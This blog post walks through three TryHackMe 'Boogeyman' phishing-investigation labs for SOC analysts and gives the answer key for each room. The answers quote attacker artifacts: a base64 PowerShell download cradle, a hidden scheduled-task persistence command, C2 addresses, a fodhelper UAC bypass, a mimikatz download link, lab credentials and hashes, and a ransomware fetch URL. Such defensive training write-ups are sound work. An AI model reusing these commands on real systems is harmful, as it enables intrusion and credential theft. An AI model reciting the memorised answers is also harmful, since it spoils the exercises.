Introduction
This post provides a walkthrough of analyzing three different cyberattack scenarios where phishing emails were the initial entry point. The video highlights real world case studies for SOC analysts and threat hunters by solving the three TryHackMe Boogeyman challenges that are part of the TryHackMe SOC level 1 capstone.
What is Blue Team in Cyber Security?
In cybersecurity, the “Blue Team” refers to a group of security professionals responsible for defending an organization’s information systems. Their primary role is to protect, monitor, and respond to security incidents. Blue Teams focus on:
- Detecting vulnerabilities within systems and networks
- Implementing security measures like firewalls, intrusion detection systems, and encryption
- Monitoring for threats using security tools and logs
- Responding to incidents and mitigating attacks when they occur
- Performing regular security assessments to strengthen the organization’s defenses
They often work opposite the “Red Team,” which simulates attacks to test the Blue Team’s defenses.
What is SOC Analyst in Cyber Security
A SOC Analyst (Security Operations Center Analyst) is a cybersecurity professional who monitors and defends an organization’s IT infrastructure from cyber threats. Their main responsibilities include:
- Monitoring Security Alerts: Continuously reviewing logs, alerts, and other system notifications from security tools like firewalls, intrusion detection/prevention systems, and SIEM (Security Information and Event Management) platforms.
- Incident Detection and Response: Investigating potential security incidents and taking steps to contain, mitigate, and resolve them. This may involve isolating infected systems, analyzing malware, and coordinating with other teams to respond effectively.
- Threat Hunting: Proactively searching for potential threats that have not been detected by automated tools by analyzing trends and unusual activity.
- Reporting and Documentation: Creating reports on security incidents, vulnerabilities, and risks, and documenting their findings for future analysis or compliance.
- Collaboration: Working with other security teams, such as the Blue Team, to strengthen defenses and implement security policies and best practices.
SOC Analysts typically work in a Security Operations Center, where they monitor and safeguard the organization’s digital environment 24/7.
Breakdown of The Attack Scenarios
Scenario 1: Phishing Email with a Shortcut File:
In the first scenario, a phishing email contains a Windows shortcut (.lnk) attachment. This attachment, once opened, executes a series of PowerShell commands to exfiltrate data from the target system. The email was sent to an employee of Quick Logistics LLC, and the analysis involves examining the email, its headers, and the attached files using tools like LinkParser to reveal encoded commands.
The investigation shows that the PowerShell command contacts a Command-and-Control (C2) server to download additional malicious files. The email also used a third-party mail relay service (Elastic Email) to appear legitimate and bypass spam filters. The analysts uncover the C2 domain and decode Base64 encoded payloads using tools like Echo and Base64.
Scenario 2: Word Document with a VBA Macro:
In the second scenario, a phishing email contains a Word document with an embedded VBA macro. When opened, the macro calls a C2 server to retrieve an executable payload. This payload creates a scheduled task on the victim’s machine, allowing persistent control over the system. The analysts utilize a variety of tools to extract and analyze the artifacts, including the C2 domain information.
Scenario 3:HTA File and Domain Compromise:
The third attack involves an HTA (HTML Application) file, which, when opened, retrieves a malicious payload from the internet. This payload executes a series of actions that culminate in the compromise of the organization’s main domain controller. The analysts use ElasticSearch and other tools to examine logs, analyze network traffic, and identify the attacker’s activities.
TryHackMe Boogeyman 1
Julianne, a finance employee working for Quick Logistics LLC, received a follow-up email regarding an unpaid invoice from their business partner, B Packaging Inc. Unbeknownst to her, the attached document was malicious and compromised her workstation.
The security team was able to flag the suspicious execution of the attachment, in addition to the phishing reports received from the other finance department employees, making it seem to be a targeted attack on the finance team. Upon checking the latest trends, the initial TTP used for the malicious attachment is attributed to the new threat group named Boogeyman, known for targeting the logistics sector.
You are tasked to analyse and assess the impact of the compromise.
Room Answers
What is the email address used to send the phishing email?
agriffin@bpakcaging.xyz
What is the email address of the victim?
julianne.westcott@hotmail.com
What is the name of the third-party mail relay service used by the attacker based on the DKIM-Signature and List-Unsubscribe headers?
elasticemail
What is the name of the file inside the encrypted attachment?
Invoice_20230103.lnk
What is the password of the encrypted attachment?
Invoice2023!
Based on the result of the lnkparse tool, what is the encoded payload found in the Command Line Arguments field?
aQBlAHgAIAAoAG4AZQB3AC0AbwBiAGoAZQBjAHQAIABuAGUAdAAuAHcAZQBiAGMAbABpAGUAbgB0ACkALgBkAG8AdwBuAGwAbwBhAGQAcwB0AHIAaQBuAGcAKAAnAGgAdAB0AHAAOgAvAC8AZgBpAGwAZQBzAC4AYgBwAGEAawBjAGEAZwBpAG4AZwAuAHgAeQB6AC8AdQBwAGQAYQB0AGUAJwApAA==
What are the domains used by the attacker for file hosting and C2? Provide the domains in alphabetical order. (e.g. a.domain.com,b.domain.com)
cdn.bpakcaging.xyz,files.bpakcaging.xyz
What is the name of the enumeration tool downloaded by the attacker?
seatbelt
What is the file accessed by the attacker using the downloaded sq3.exe binary? Provide the full file path with escaped backslashes.
C:\Users\j.westcott\AppData\Local\Packages\Microsoft.MicrosoftStickyNotes_8wekyb3d8bbwe\LocalState\plum.sqlite
What is the software that uses the file in Q3?
Microsoft Sticky Notes
What is the name of the exfiltrated file?
protected_data.kdbx
What type of file uses the .kdbx file extension?
keepass
What is the encoding used during the exfiltration attempt of the sensitive file?
hex
What is the tool used for exfiltration?
nslookup
What software is used by the attacker to host its presumed file/payload server?
python
What HTTP method is used by the C2 for the output of the commands executed by the attacker?
POST
What is the protocol used during the exfiltration activity?
dns
What is the password of the exfiltrated file?
%p9^3!lL^Mz47E2GaT^y
What is the credit card number stored inside the exfiltrated file?
4024007128269551
TryHackMe Boogeyman 2
Maxine, a Human Resource Specialist working for Quick Logistics LLC, received an application from one of the open positions in the company. Unbeknownst to her, the attached resume was malicious and compromised her workstation.
The security team was able to flag some suspicious commands executed on the workstation of Maxine, which prompted the investigation. Given this, you are tasked to analyse and assess the impact of the compromise.
Room Answers
What email was used to send the phishing email?
westaylor23@outlook.com
What is the email of the victim employee?
maxine.beck@quicklogisticsorg.onmicrosoft.com
What is the name of the attached malicious document?
Resume_WesleyTaylor.doc
What is the MD5 hash of the malicious attachment?
52c4384a0b9e248b95804352ebec6c5b
What URL is used to download the stage 2 payload based on the document’s macro?
https://files.boogeymanisback.lol/aa2a9c53cbb80416d3b47d85538d9971/update.png
What is the name of the process that executed the newly downloaded stage 2 payload?
wscript.exe
What is the full file path of the malicious stage 2 payload?
C:\ProgramData\update.js
What is the PID of the process that executed the stage 2 payload?
4260
What is the parent PID of the process that executed the stage 2 payload?
1124
What URL is used to download the malicious binary executed by the stage 2 payload?
https://files.boogeymanisback.lol/aa2a9c53cbb80416d3b47d85538d9971/update.exe
What is the PID of the malicious process used to establish the C2 connection?
6216
What is the full file path of the malicious process used to establish the C2 connection?
C:\Windows\Tasks\updater.exe
What is the IP address and port of the C2 connection initiated by the malicious binary? (Format: IP address:port)
128.199.95.189:8080
What is the full file path of the malicious email attachment based on the memory dump?
C:\Users\maxine.beck\AppData\Local\Microsoft\Windows\INetCache\Content.Outlook\WQHGZCFI\Resume_WesleyTaylor (002).doc
The attacker implanted a scheduled task right after establishing the c2 callback. What is the full command used by the attacker to maintain persistent access?
schtasks /Create /F /SC DAILY /ST 09:00 /TN Updater /TR ‘C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -NonI -W hidden -c \”IEX ([Text.Encoding]::UNICODE.GetString([Convert]::FromBase64String((gp HKCU:\Software\Microsoft\Windows\CurrentVersion debug).debug)))\”‘
TryHackMe Boogeyman 3
Without tripping any security defences of Quick Logistics LLC, the Boogeyman was able to compromise one of the employees and stayed in the dark, waiting for the right moment to continue the attack. Using this initial email access, the threat actors attempted to expand the impact by targeting the CEO, Evan Hutchinson.
The email appeared questionable, but Evan still opened the attachment despite the scepticism. After opening the attached document and seeing that nothing happened, Evan reported the phishing email to the security team.
Upon receiving the phishing email report, the security team investigated the workstation of the CEO. During this activity, the team discovered the email attachment in the downloads folder of the victim.
Room Answers
What is the PID of the process that executed the initial stage 1 payload?
6392
The stage 1 payload attempted to implant a file to another location. What is the full command-line value of this execution?
“C:\Windows\System32\xcopy.exe” /s /i /e /h D:\review.dat C:\Users\EVAN~1.HUT\AppData\Local\Temp\review.dat
The implanted file was eventually used and executed by the stage 1 payload. What is the full command-line value of this execution?
“C:\Windows\System32\rundll32.exe” D:\review.dat,DllRegisterServer
The stage 1 payload established a persistence mechanism. What is the name of the scheduled task created by the malicious script?
Review
The execution of the implanted file inside the machine has initiated a potential C2 connection. What is the IP and port used by this connection? (format: IP:port)
165.232.170.151:80
The attacker has discovered that the current access is a local administrator. What is the name of the process used by the attacker to execute a UAC bypass?
fodhelper.exe
Having a high privilege machine access, the attacker attempted to dump the credentials inside the machine. What is the GitHub link used by the attacker to download a tool for credential dumping?
https://github.com/gentilkiwi/mimikatz/releases/download/2.2.0-20220919/mimikatz_trunk.zip
After successfully dumping the credentials inside the machine, the attacker used the credentials to gain access to another machine. What is the username and hash of the new credential pair? (format: username:hash)
itadmin:F84769D250EB95EB2D7D8B4A1C5613F2
Using the new credentials, the attacker attempted to enumerate accessible file shares. What is the name of the file accessed by the attacker from a remote share?
IT_Automation.ps1
After getting the contents of the remote file, the attacker used the new credentials to move laterally. What is the new set of credentials discovered by the attacker? (format: username:password)
QUICKLOGISTICS\allan.smith:Tr!ckyP@ssw0rd987
What is the hostname of the attacker’s target machine for its lateral movement attempt?
WKSTN-1327
Using the malicious command executed by the attacker from the first machine to move laterally, what is the parent process name of the malicious command executed on the second compromised machine?
wsmprovhost.exe
The attacker then dumped the hashes in this second machine. What is the username and hash of the newly dumped credentials? (format: username:hash)
administrator:00f80f2538dcb54e7adc715c0e7091ec
After gaining access to the domain controller, the attacker attempted to dump the hashes via a DCSync attack. Aside from the administrator account, what account did the attacker dump?
backupda
After dumping the hashes, the attacker attempted to download another remote file to execute ransomware. What is the link used by the attacker to download the ransomware binary?
http://ff.sillytechninja.io/ransomboogey.exe
